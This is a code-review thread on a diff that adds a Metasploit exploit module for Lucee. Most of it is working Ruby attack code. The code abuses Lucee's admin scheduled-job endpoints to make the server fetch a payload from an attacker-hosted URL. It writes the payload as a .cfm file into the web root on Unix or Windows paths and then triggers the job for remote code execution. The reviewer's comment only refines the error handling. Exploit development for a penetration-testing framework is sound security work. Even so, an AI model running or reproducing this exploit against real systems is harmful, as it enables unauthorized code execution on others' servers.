modules/exploits/multi/http/lucee_scheduled_job.rb

```diff
@@ -0,0 +1,282 @@
+    create_job = send_request_cgi({
+      'method' => 'POST',
+      'uri' => target_uri.path + '?action=services.schedule&action2=create',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'name' => payload_base,
+        'url' => exploit_url,
+        'interval' => '3600',
+        'start_day' => '01',
+        'start_month' => '02',
+        'start_year' => '2023',
+        'start_hour' => '00',
+        'start_minute' => '00',
+        'start_second' => '00',
+        'run' => 'create'
+      }
+    })
+    case target['Type']
+    when :unix_cmd
+      file_path = '\\opt\\lucee\\tomcat\\webapps\\ROOT\\'
+    when :windows_cmd
+      file_path = 'C:\\lucee\\tomcat\\webapps\\ROOT\\'
+    end
+    update_job = send_request_cgi({
+      'method' => 'POST',
+      'uri' => target_uri.path + '?' + create_job.headers['location'].partition('?').last,
+      'keep_cookies' => true,
+      'vars_post' => {
+        'name' => payload_base,
+        'url' => exploit_url,
+        'port' => datastore['SRVPORT'],
+        'timeout' => '50',
+        'username' => '',
+        'password' => '',
+        'proxyserver' => '',
+        'proxyport' => '',
+        'proxyuser' => '',
+        'proxypassword' => '',
+        'publish' => 'true',
+        'file' => "#{file_path}#{payload_base}.cfm", # Four path traversals put the file in the web root, whether Windows or Unix systems.
+        'resolveurl' => 'yes',
+        'start_day' => '01',
+        'start_month' => '02',
+        'start_year' => '2023',
+        'start_hour' => '00',
+        'start_minute' => '00',
+        'start_second' => '00',
+        'end_day' => '',
+        'end_month' => '',
+        'end_year' => '',
+        'end_hour' => '',
+        'end_minute' => '',
+        'end_second' => '',
+        'interval_hour' => '1',
+        'interval_minute' => '0',
+        'interval_second' => '0',
+        'run' => 'update'
+      }
+    })
+    if create_job && create_job.code == 302
+      print_good('Job ' + payload_base + ' created successfully')
+    else
+      fail_with(Failure::Unknown, 'Unable to create job')
+
+    end
+    if update_job && update_job.code == 302 || update_job && update_job.code == 200
+      print_good('Job ' + payload_base + ' updated successfully')
+    else
+      fail_with(Failure::Unknown, 'Unable to update job')
+    end
+  end
+
+  def execute_job(payload_base)
+    print_status("Executing scheduled job: #{payload_base}")
+    job_execution = send_request_cgi({
+      'method' => 'POST',
+      'uri' => target_uri.path + '?action=services.schedule',
+      'vars_post' => {
+        'row_1' => '1',
+        'name_1' => payload_base,
+        'mainAction' => 'execute'
+      }
+
+    })
+
+    if job_execution && job_execution.code == 302
+      print_good('Job ' + payload_base + ' executed successfully')
+    else
+      fail_with(Failure::Unknown, 'Unable to execute job')
+    end
```

Comment:
Same here with the failure codes.

```suggestion
    fail_with(Failure::Unreachable, 'Could not connect to the web service') if job_execution.nil?
    fail_with(Failure::Unknown, 'Unable to execute job') unless job_execution.code == 302 || job_execution.code == 200
      
    print_good('Job ' + payload_base + ' executed successfully')
```